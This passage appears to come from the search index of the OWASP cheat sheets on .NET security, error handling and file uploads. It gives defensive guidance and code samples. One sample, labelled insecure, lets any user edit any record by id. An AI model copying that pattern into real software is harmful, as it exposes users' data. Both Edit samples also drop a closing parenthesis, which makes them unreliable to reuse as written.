[Authorize(Roles\u00a0=\u00a0\"Admin\")]\n[HttpGet]\npublic\u00a0ActionResult\u00a0Index(int\u00a0page\u00a0=\u00a01)\n

or better yet, at controller level:

[Authorize]\npublic\u00a0class\u00a0UserController\n

You can also check roles in code using identity features in .net: System.Web.Security.Roles.IsUserInRole(userName, roleName)

You can find more information here on Access Control and here for Authorization.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#insecure-direct-object-references","title":"Insecure Direct object references","text":"

When you have a resource (object) which can be accessed by a reference (in the sample below this is the id) then you need to ensure that the user is intended to be there

//\u00a0Insecure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\nreturn\u00a0View(\"Details\",\u00a0new\u00a0UserViewModel(user);\n}\n\n//\u00a0Secure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\n//\u00a0Establish\u00a0user\u00a0has\u00a0right\u00a0to\u00a0edit\u00a0the\u00a0details\nif\u00a0(user.Id\u00a0!=\u00a0_userIdentity.GetUserId())\n{\nHandleErrorInfo\u00a0error\u00a0=\u00a0new\u00a0HandleErrorInfo(\nnew\u00a0Exception(\"INFO:\u00a0You\u00a0do\u00a0not\u00a0have\u00a0permission\u00a0to\u00a0edit\u00a0these\u00a0details\"));\nreturn\u00a0View(\"Error\",\u00a0error);\n}\nreturn\u00a0View(\"Edit\",\u00a0new\u00a0UserViewModel(user);\n}\n

More information can be found here for Insecure Direct Object Reference.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-security-misconfiguration","title":"A6 Security Misconfiguration","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#debug-and-stack-trace","title":"Debug and Stack Trace","text":"

Ensure debug and trace are off in production. This can be enforced using web.config transforms:

<compilation xdt:Transform=\"RemoveAttributes(debug)\" />\n<trace enabled=\"false\" xdt:Transform=\"Replace\"/>\n

DO NOT: Use default passwords

DO: (When using TLS) Redirect a request made over Http to https:

e.g Global.asax.cs

protected\u00a0void\u00a0Application_BeginRequest()\n{\n#if\u00a0!DEBUG\n//\u00a0SECURE:\u00a0Ensure\u00a0any\u00a0request\u00a0is\u00a0returned\u00a0over\u00a0SSL/TLS\u00a0in\u00a0production\nif\u00a0(!Request.IsLocal\u00a0&&\u00a0!Context.Request.IsSecureConnection)\u00a0{\nvar\u00a0redirect\u00a0=\u00a0Context.Request.Url.ToString()\n.ToLower(CultureInfo.CurrentCulture)\n.Replace(\"http:\",\u00a0\"https:\");\nResponse.Redirect(redirect);\n}\n#endif\n}\n

e.g Startup.cs in the Configure()

  app.UseHttpsRedirection();\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery","title":"Cross-site request forgery","text":"

DO NOT: Send sensitive data without validating Anti-Forgery-Tokens (.NET / .NET Core).

DO: Send the anti-forgery token with every POST/PUT request:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-framework","title":"Using .NET Framework","text":"
using (Html.BeginForm(\"LogOff\", \"Account\", FormMethod.Post, new { id = \"logoutForm\",\n@class = \"pull-right\" }))\n{\n@Html.AntiForgeryToken()\n<ul class=\"nav nav-pills\">\n<li role=\"presentation\">\nLogged on as @User.Identity.Name\n</li>\n<li role=\"presentation\">\n<a href=\"javascript:document.getElementById('logoutForm').submit()\">Log off</a>\n</li>\n</ul>\n}\n

Then validate it at the method or preferably the controller level:

[HttpPost]\n[ValidateAntiForgeryToken]\npublic\u00a0ActionResult\u00a0LogOff()\n

Make sure the tokens are removed completely for invalidation on logout.

///\u00a0<summary>\n///\u00a0SECURE:\u00a0Remove\u00a0any\u00a0remaining\u00a0cookies\u00a0including\u00a0Anti-CSRF\u00a0cookie\n///\u00a0</summary>\npublic\u00a0void\u00a0RemoveAntiForgeryCookie(Controller\u00a0controller)\n{\nstring[]\u00a0allCookies\u00a0=\u00a0controller.Request.Cookies.AllKeys;\nforeach\u00a0(string\u00a0cookie\u00a0in\u00a0allCookies)\n{\nif\u00a0(controller.Response.Cookies[cookie]\u00a0!=\u00a0null\u00a0&&\ncookie\u00a0==\u00a0\"__RequestVerificationToken\")\n{\ncontroller.Response.Cookies[cookie].Expires\u00a0=\u00a0DateTime.Now.AddDays(-1);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-later","title":"Using .NET Core 2.0 or later","text":"

Starting with .NET Core 2.0 it is possible to automatically generate and verify the antiforgery token.

If you are using tag-helpers, which is the default for most web project templates, then all forms will automatically send the anti-forgery token. You can check if tag-helpers are enabled by checking if your main _ViewImports.cshtml file contains:

@addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers\n

IHtmlHelper.BeginForm also sends anti-forgery-tokens automatically.

Unless you are using tag-helpers or IHtmlHelper.BeginForm, you must use the requisite helper on forms as seen here:

<form action=\"RelevantAction\" >\n@Html.AntiForgeryToken()\n</form>\n

To automatically validate all requests other than GET, HEAD, OPTIONS and TRACE you need to add a global action filter with the AutoValidateAntiforgeryToken attribute inside your Startup.cs as mentioned in the following article:

services.AddMvc(options =>\n{\noptions.Filters.Add(new AutoValidateAntiforgeryTokenAttribute());\n});\n

If you need to disable the attribute validation for a specific method on a controller you can add the IgnoreAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[IgnoreAntiforgeryToken]\n[HttpDelete]\npublic IActionResult Delete()\n
[IgnoreAntiforgeryToken]\npublic class UnsafeModel : PageModel\n

If you need to also validate the token on GET, HEAD, OPTIONS or TRACE - requests you can add the ValidateAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[HttpGet]\n[ValidateAntiforgeryToken]\npublic IActionResult DoSomethingDangerous()\n
[HttpGet]\n[ValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n

In case you can't use a global action filter, add the AutoValidateAntiforgeryToken attribute to your controller classes or razor page models:

[AutoValidateAntiforgeryToken]\npublic class UserController\n
[AutoValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-net-framework-with-ajax","title":"Using .Net Core 2.0 or .NET Framework with AJAX","text":"

You will need to attach the anti-forgery token to AJAX requests.

If you are using jQuery in an ASP.NET Core MVC view this can be achieved using this snippet:

@inject  Microsoft.AspNetCore.Antiforgery.IAntiforgery antiforgeryProvider\n$.ajax(\n{\ntype: \"POST\",\nurl: '@Url.Action(\"Action\", \"Controller\")',\ncontentType: \"application/x-www-form-urlencoded; charset=utf-8\",\ndata: {\nid: id,\n'__RequestVerificationToken': '@antiforgeryProvider.GetAndStoreTokens(this.Context).RequestToken'\n}\n})\n

If you are using the .NET Framework, you can find some code snippets here.

More information can be found here for Cross-Site Request Forgery.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a7-cross-site-scripting-xss","title":"A7 Cross-Site Scripting (XSS)","text":"

DO NOT: Trust any data the user sends you, prefer allow lists (always safe) over block lists

You get encoding of all HTML content with MVC3, to properly encode all content whether HTML, javascript, CSS, LDAP etc use the Microsoft AntiXSS library:

Install-Package\u00a0AntiXSS

Then set in config:

<system.web>\n<httpRuntime targetFramework=\"4.5\"\nenableVersionHeader=\"false\"\nencoderType=\"Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary\"\nmaxRequestLength=\"4096\" />\n

DO NOT: Use the [AllowHTML] attribute or helper class @Html.Raw unless you really know that the content you are writing to the browser is safe and has been escaped properly.

DO: Enable a Content Security Policy, this will prevent your pages from accessing assets it should not be able to access (e.g. a malicious script):

<system.webServer>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self';\n                font-src 'self'; script-src 'self'\" />\n

More information can be found here for Cross-Site Scripting.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a8-insecure-deserialization","title":"A8 Insecure Deserialization","text":"

Information about Insecure Deserialization can be found on this cheat sheet.

DO NOT: Accept Serialized Objects from Untrusted Sources

DO: Validate User Input Malicious users are able to use objects like cookies to insert malicious information to change user roles. In some cases, hackers are able to elevate their privileges to administrator rights by using a pre-existing or cached password hash from a previous session.

DO: Prevent Deserialization of Domain Objects

DO: Run the Deserialization Code with Limited Access Permissions If a deserialized hostile object tries to initiate a system processes or access a resource within the server or the host's OS, it will be denied access and a permission flag will be raised so that a system administrator is made aware of any anomalous activity on the server.

More information can be found here: Deserialization Cheat Sheet

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a9-using-components-with-known-vulnerabilities","title":"A9 Using Components with Known Vulnerabilities","text":"

DO: Keep the .Net framework updated with the latest patches

DO: Keep your NuGet packages up to date, many will contain their own vulnerabilities.

DO: Run the OWASP Dependency Checker against your application as part of your build process and act on any high level vulnerabilities.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-insufficient-logging-monitoring","title":"A10 Insufficient Logging & Monitoring","text":"

DO: Ensure all login, access control failures and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as: csharp Log.Error(\"Error was thrown\"); rather log the stack trace, error message and user ID who caused the error.

DO NOT: Log sensitive data such as user's passwords.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

What Logs to Collect and more information about Logging can be found on this cheat sheet.

.NET Core come with a LoggerFactory, which is in Microsoft.Extensions.Logging. More information about ILogger can be found here.

How to log all errors from the Startup.cs, so that anytime an error is thrown it will be logged.

public void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\nif (env.IsDevelopment())\n{\n_isDevelopment = true;\napp.UseDeveloperExceptionPage();\n}\n\n//Log all errors in the application\napp.UseExceptionHandler(errorApp =>\n{\nerrorApp.Run(async context =>\n{\nvar errorFeature = context.Features.Get<IExceptionHandlerFeature>();\nvar exception = errorFeature.Error;\n\nLog.Error(String.Format(\"Stacktrace of error: {0}\",exception.StackTrace.ToString()));\n});\n});\n\napp.UseAuthentication();\napp.UseMvc();\n}\n}\n

e.g Injecting into the class constructor, which makes writing unit test simpler. It is recommended if instances of the class will be created using dependency injection (e.g. MVC controllers). The below example shows logging of all unsuccessful log in attempts.

public class AccountsController : Controller\n{\nprivate ILogger _Logger;\n\npublic AccountsController( ILogger logger)\n{\n_Logger = logger;\n}\n\n[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\npublic async Task<IActionResult> Login(LoginViewModel model)\n{\nif (ModelState.IsValid)\n{\nvar result = await _signInManager.PasswordSignInAsync(model.Email, model.Password, model.RememberMe, lockoutOnFailure: false);\nif (result.Succeeded)\n{\n//Log all successful log in attempts\nLog.Information(String.Format(\"User: {0}, Successfully Logged in\", model.Email));\n//Code for successful login\n}\nelse\n{\n//Log all incorrect log in attempts\nLog.Information(String.Format(\"User: {0}, Incorrect Password\", model.Email));\n}\n}\n...\n}\n

Logging levels for ILogger are listed below, in order of high to low importance:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

Monitoring allow us to validate the performance and health of a running system through key performance indicators.

In .NET a great option to add monitoring capabilities is Application Insights.

More information about Logging and Monitoring can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#owasp-2013","title":"OWASP 2013","text":"

Below is vulnerability not discussed in OWASP 2017

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-unvalidated-redirects-and-forwards","title":"A10 Unvalidated redirects and forwards","text":"

A protection against this was introduced in Mvc 3 template. Here is the code:

public\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n{\nif\u00a0(ModelState.IsValid)\n{\nvar\u00a0logonResult\u00a0=\u00a0await\u00a0_userManager.TryLogOnAsync(model.UserName,\u00a0model.Password);\nif\u00a0(logonResult.Success)\n{\nawait\u00a0_userManager.LogOnAsync(logonResult.UserName,\u00a0model.RememberMe);\u00a0\u00a0return\u00a0RedirectToLocal(returnUrl);\n...\n
private\u00a0ActionResult\u00a0RedirectToLocal(string\u00a0returnUrl)\n{\nif\u00a0(Url.IsLocalUrl(returnUrl))\n{\nreturn\u00a0Redirect(returnUrl);\n}\nelse\n{\nreturn\u00a0RedirectToAction(\"Landing\",\u00a0\"Account\");\n}\n}\n

Other advice:

More information:

For more information on all of the above and code samples incorporated into a sample MVC5 application with an enhanced security baseline go to Security Essentials Baseline project

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#xaml-guidance","title":"XAML Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#windows-forms-guidance","title":"Windows Forms Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#wcf-guidance","title":"WCF Guidance","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html","title":"Error Handling Cheat Sheet","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Error handling is a part of the overall security of an application. Except in movies, an attack always begins with a Reconnaissance phase in which the attacker will try to gather as much technical information (often name and version properties) as possible about the target, such as the application server, frameworks, libraries, etc.

Unhandled errors can assist an attacker in this initial phase, which is very important for the rest of the attack.

The following link provides a description of the different phases of an attack.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#context","title":"Context","text":"

Issues at the error handling level can reveal a lot of information about the target and can also be used to identify injection points in the target's features.

Below is an example of the disclosure of a technology stack, here the Struts2 and Tomcat versions, via an exception rendered to the user:

HTTP Status 500 - For input string: \"null\"\n\ntype Exception report\n\nmessage For input string: \"null\"\n\ndescription The server encountered an internal error that prevented it from fulfilling this request.\n\nexception\n\njava.lang.NumberFormatException: For input string: \"null\"\n    java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)\n    java.lang.Integer.parseInt(Integer.java:492)\n    java.lang.Integer.parseInt(Integer.java:527)\n    sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n    sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\n    sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n    java.lang.reflect.Method.invoke(Method.java:606)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:450)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeActionOnly(DefaultActionInvocation.java:289)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:252)\n    org.apache.struts2.interceptor.debugging.DebuggingInterceptor.intercept(DebuggingInterceptor.java:256)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:246)\n    ...\n\nnote: The full stack trace of the root cause is available in the Apache Tomcat/7.0.56 logs.\n

Below is an example of disclosure of a SQL query error, along with the site installation path, that can be used to identify an injection point:

Warning: odbc_fetch_array() expects parameter /1 to be resource, boolean given\nin D:\\app\\index_new.php on line 188\n

The OWASP Testing Guide provides different techniques to obtain technical information from an application.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#objective","title":"Objective","text":"

The article shows how to configure a global error handler as part of your application's runtime configuration. In some cases, it may be more efficient to define this error handler as part of your code. The outcome being that when an unexpected error occurs then a generic response is returned by the application but the error details are logged server side for investigation, and not returned to the user.

The following schema shows the target approach:

As most recent application topologies are API based, we assume in this article that the backend exposes only a REST API and does not contain any user interface content. The application should try and exhaustively cover all possible failure modes and use 5xx errors only to indicate responses to requests that it cannot fulfill, but not provide any content as part of the response that would reveal implementation details. For that, RFC 7807 - Problem Details for HTTP APIs defines a document format. For the error logging operation itself, the logging cheat sheet should be used. This article focuses on the error handling part.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#proposition","title":"Proposition","text":"

For each technology stack, the following configuration options are proposed:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#standard-java-web-application","title":"Standard Java Web Application","text":"

For this kind of application, a global error handler can be configured at the web.xml deployment descriptor level.

We propose here a configuration that can be used from Servlet specification version 2.5 and above.

With this configuration, any unexpected error will cause a redirection to the page error.jsp in which the error will be traced and a generic response will be returned.

Configuration of the redirection into the web.xml file:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" ns=\"http://java.sun.com/xml/ns/javaee\"\nxsi:schemaLocation=\"http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd\"\nversion=\"3.0\">\n...\n    <error-page>\n<exception-type>java.lang.Exception</exception-type>\n<location>/error.jsp</location>\n</error-page>\n...\n</web-app>\n

Content of the error.jsp file:

<%@ page language=\"java\" isErrorPage=\"true\" contentType=\"application/json; charset=UTF-8\"\npageEncoding=\"UTF-8\"%>\n<%\nString errorMessage = exception.getMessage();\n//Log the exception via the content of the implicit variable named \"exception\"\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response is an error\nresponse.setHeader(\"X-ERROR\", \"true\");\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, when we have misbehaving clients\nresponse.setStatus(500);\n%>\n{\"message\":\"An error occur, please retry\"}\n
"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#java-springmvcspringboot-web-application","title":"Java SpringMVC/SpringBoot web application","text":"

With SpringMVC or SpringBoot, you can define a global error handler by implementing the following class in your project. Spring Framework 6 introduced the problem details based on RFC 7807.

We indicate to the handler, via the annotation @ExceptionHandler, to act when any exception extending the class java.lang.Exception is thrown by the application. We also use the ProblemDetail class to create the response object.

import org.springframework.http.HttpStatus;\nimport org.springframework.http.ProblemDetail;\nimport org.springframework.web.bind.annotation.ExceptionHandler;\nimport org.springframework.web.bind.annotation.RestControllerAdvice;\nimport org.springframework.web.context.request.WebRequest;\nimport org.springframework.web.servlet.mvc.method.annotation.ResponseEntityExceptionHandler;\n\n/**\n * Global error handler in charge of returning a generic response in case of unexpected error situation.\n */\n@RestControllerAdvice\npublic class RestResponseEntityExceptionHandler extends ResponseEntityExceptionHandler {\n\n@ExceptionHandler(value = {Exception.class})\npublic ProblemDetail handleGlobalError(RuntimeException exception, WebRequest request) {\n//Log the exception via the content of the parameter named \"exception\"\n//...\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\n//By specification, the content-type can be \"application/problem+json\" or \"application/problem+xml\"\nreturn ProblemDetail.forStatusAndDetail(HttpStatus.INTERNAL_SERVER_ERROR, \"An error occur, please retry\");\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-core-web-application","title":"ASP NET Core web application","text":"

With ASP.NET Core, you can define a global error handler by indicating that the exception handler is a dedicated API Controller.

Content of the API Controller dedicated to the error handling:

using Microsoft.AspNetCore.Authorization;\nusing Microsoft.AspNetCore.Diagnostics;\nusing Microsoft.AspNetCore.Mvc;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\n\nnamespace MyProject.Controllers\n{\n/// <summary>\n/// API Controller used to intercept and handle all unexpected exception\n/// </summary>\n[Route(\"api/[controller]\")]\n[ApiController]\n[AllowAnonymous]\npublic class ErrorController : ControllerBase\n{\n/// <summary>\n/// Action that will be invoked for any call to this Controller in order to handle the current error\n/// </summary>\n/// <returns>A generic error formatted as JSON because we are in a REST API app context</returns>\n[HttpGet]\n[HttpPost]\n[HttpHead]\n[HttpDelete]\n[HttpPut]\n[HttpOptions]\n[HttpPatch]\npublic JsonResult Handle()\n{\n//Get the exception that has implied the call to this controller\nException exception = HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\nJsonResult response = new JsonResult(responseBody);\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\nresponse.StatusCode = (int)HttpStatusCode.InternalServerError;\nRequest.HttpContext.Response.Headers.Remove(\"X-ERROR\");\nRequest.HttpContext.Response.Headers.Add(\"X-ERROR\", \"true\");\nreturn response;\n}\n}\n}\n

Definition in the application Startup.cs file of the mapping of the exception handler to the dedicated error handling API controller:

using Microsoft.AspNetCore.Builder;\nusing Microsoft.AspNetCore.Hosting;\nusing Microsoft.AspNetCore.Mvc;\nusing Microsoft.Extensions.Configuration;\nusing Microsoft.Extensions.DependencyInjection;\n\nnamespace MyProject\n{\npublic class Startup\n{\n...\npublic void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\n//First we configure the error handler middleware!\n//We enable the global error handler in others environments than DEV\n//because debug page are useful during implementation\nif (env.IsDevelopment())\n{\napp.UseDeveloperExceptionPage();\n}\nelse\n{\n//Our global handler is defined on \"/api/error\" URL so we indicate to the\n//exception handler to call this API controller\n//on any unexpected exception raised by the application\napp.UseExceptionHandler(\"/api/error\");\n\n//To customize the response content type and text, use the overload of\n//UseStatusCodePages that takes a content type and format string.\napp.UseStatusCodePages(\"text/plain\", \"Status code page, status code: {0}\");\n}\n\n//We configure others middlewares, remember that the declaration order is important...\napp.UseMvc();\n//...\n}\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-web-api-web-application","title":"ASP NET Web API web application","text":"

With ASP.NET Web API (from the standard .NET framework and not from the .NET Core framework), you can define and register handlers in order to trace and handle any error that occurs in the application.

Definition of the handler for the tracing of the error details:

using System;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global logger used to trace any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorLogger : ExceptionLogger\n{\n/// <summary>\n/// Method in charge of the management of the error from a tracing point of view\n/// </summary>\n/// <param name=\"context\">Context containing the error details</param>\npublic override void Log(ExceptionLoggerContext context)\n{\n//Get the exception\nException exception = context.Exception;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n}\n}\n}\n

Definition of the handler for the management of the error in order to return a generic response:

using Newtonsoft.Json;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\nusing System.Net.Http;\nusing System.Text;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global handler used to handle any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorHandler : ExceptionHandler\n{\n/// <summary>\n/// Method in charge of handle the generic response send in case of error\n/// </summary>\n/// <param name=\"context\">Error context</param>\npublic override void Handle(ExceptionHandlerContext context)\n{\ncontext.Result = new GenericResult();\n}\n\n/// <summary>\n/// Class used to represent the generic response send\n/// </summary>\nprivate class GenericResult : IHttpActionResult\n{\n/// <summary>\n/// Method in charge of creating the generic response\n/// </summary>\n/// <param name=\"cancellationToken\">Object to cancel the task</param>\n/// <returns>A task in charge of sending the generic response</returns>\npublic Task<HttpResponseMessage> ExecuteAsync(CancellationToken cancellationToken)\n{\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\n// Note that we're using an internal server error response\n// In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients \nHttpResponseMessage response = new HttpResponseMessage(HttpStatusCode.InternalServerError);\nresponse.Headers.Add(\"X-ERROR\", \"true\");\nresponse.Content = new StringContent(JsonConvert.SerializeObject(responseBody),\nEncoding.UTF8, \"application/json\");\nreturn Task.FromResult(response);\n}\n}\n}\n}\n

Registration of the both handlers in the application WebApiConfig.cs file:

using MyProject.Security;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject\n{\npublic static class WebApiConfig\n{\npublic static void Register(HttpConfiguration config)\n{\n//Register global error logging and handling handlers in first\nconfig.Services.Replace(typeof(IExceptionLogger), new GlobalErrorLogger());\nconfig.Services.Replace(typeof(IExceptionHandler), new GlobalErrorHandler());\n//Rest of the configuration\n//...\n}\n}\n}\n

Setting customErrors section to the Web.config file within the csharp <system.web> node as follows.

<configuration>\n...\n<system.web>\n<customErrors mode=\"RemoteOnly\"\ndefaultRedirect=\"~/ErrorPages/Oops.aspx\" />\n...\n</system.web>\n</configuration>\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

The source code of all the sandbox projects created to find the right setup to use is stored in this GitHub repository.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#appendix-http-errors","title":"Appendix HTTP Errors","text":"

A reference for HTTP errors can be found here RFC 2616. Using error messages that do not provide implementation details is important to avoid information leakage. In general, consider using 4xx error codes for requests that are due to an error on the part of the HTTP client (e.g. unauthorized access, request body too large) and use 5xx to indicate errors that are triggered on server side, due to an unforeseen bug. Ensure that applications are monitored for 5xx errors which are a good indication of the application failing for some sets of inputs.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html","title":"File Upload Cheat Sheet","text":""},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#introduction","title":"Introduction","text":"

File upload is becoming a more and more essential part of any application, where the user is able to upload their photo, their CV, or a video showcasing a project they are working on. The application should be able to fend off bogus and malicious files in a way to keep the application and the users safe.

In short, the following principles should be followed to reach a secure file upload implementation:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-threats","title":"File Upload Threats","text":"

In order to assess and know exactly what controls to implement, knowing what you're facing is essential to protect your assets. The following sections will hopefully showcase the risks accompanying the file upload functionality.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#malicious-files","title":"Malicious Files","text":"

The attacker delivers a file for malicious intent, such as:

  1. Exploit vulnerabilities in the file parser or processing module (e.g. ImageTrick Exploit, XXE)
  2. Use the file for phishing (e.g. careers form)
  3. Send ZIP bombs, XML bombs (otherwise known as billion laughs attack), or simply huge files in a way to fill the server storage which hinders and damages the server's availability
  4. Overwrite an existing file on the system
  5. Client-side active content (XSS, CSRF, etc.) that could endanger other users if the files are publicly retrievable.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#public-file-retrieval","title":"Public File Retrieval","text":"

If the file uploaded is publicly retrievable, additional threats can be addressed:

  1. Public disclosure of other files
  2. Initiate a DoS attack by requesting lots of files. Requests are small, yet responses are much larger
  3. File content that could be deemed as illegal, offensive, or dangerous (e.g. personal data, copyrighted data, etc.) which will make you a host for such malicious files.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-protection","title":"File Upload Protection","text":"

There is no silver bullet in validating user content. Implementing a defense in depth approach is key to make the upload process harder and more locked down to the needs and requirements for the service. Implementing multiple techniques is key and recommended, as no one technique is enough to secure the service.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#extension-validation","title":"Extension Validation","text":"

Ensure that the validation occurs after decoding the file name, and that a proper filter is set in place in order to avoid certain known bypasses, such as the following:

Refer to the Input Validation CS to properly parse and process the extension.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#list-allowed-extensions","title":"List Allowed Extensions","text":"

Ensure the usage of business-critical extensions only, without allowing any type of non-required extensions. For example if the system requires:

Based on the needs of the application, ensure the least harmful and the lowest risk file types to be used.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#block-extensions","title":"Block Extensions","text":"

Identify potentially harmful file types and block extensions that you regard harmful to your service.

Please be aware that blocking specific extensions is a weak protection method on its own. The Unrestricted File Upload vulnerability article describes how attackers may attempt to bypass such a check.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation","title":"Content-Type Validation","text":"

The Content-Type for uploaded files is provided by the user, and as such cannot be trusted, as it is trivial to spoof. Although it should not be relied upon for security, it provides a quick check to prevent users from unintentionally uploading files with the incorrect type.

Other than defining the extension of the uploaded file, its MIME-type can be checked for a quick protection against simple file upload attacks.

This can be done preferably in an allow list approach; otherwise, this can be done in a block list approach.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-signature-validation","title":"File Signature Validation","text":"

In conjunction with content-type validation, validating the file's signature can be checked and verified against the expected file that should be received.

This should not be used on its own, as bypassing it is pretty common and easy.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filename-sanitization","title":"Filename Sanitization","text":"

Filenames can endanger the system in multiple ways, either by using non acceptable characters, or by using special and restricted filenames. For Windows, refer to the following MSDN guide. For a wider overview on different filesystems and how they treat files, refer to Wikipedia's Filename page.

In order to avoid the above mentioned threat, creating a random string as a file-name, such as generating a UUID/GUID, is essential. If the filename is required by the business needs, proper input validation should be done for client-side (e.g. active content that results in XSS and CSRF attacks) and back-end side (e.g. special files overwrite or creation) attack vectors. Filename length limits should be taken into consideration based on the system storing the files, as each system has its own filename length limit. If user filenames are required, consider implementing the following:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-content-validation","title":"File Content Validation","text":"

As mentioned in the Public File Retrieval section, file content can contain malicious, inappropriate, or illegal data.

Based on the expected type, special file content validation can be applied:

The File Upload service should allow users to report illegal content, and copyright owners to report abuse.

If there are enough resources, manual file review should be conducted in a sandboxed environment before releasing the files to the public.

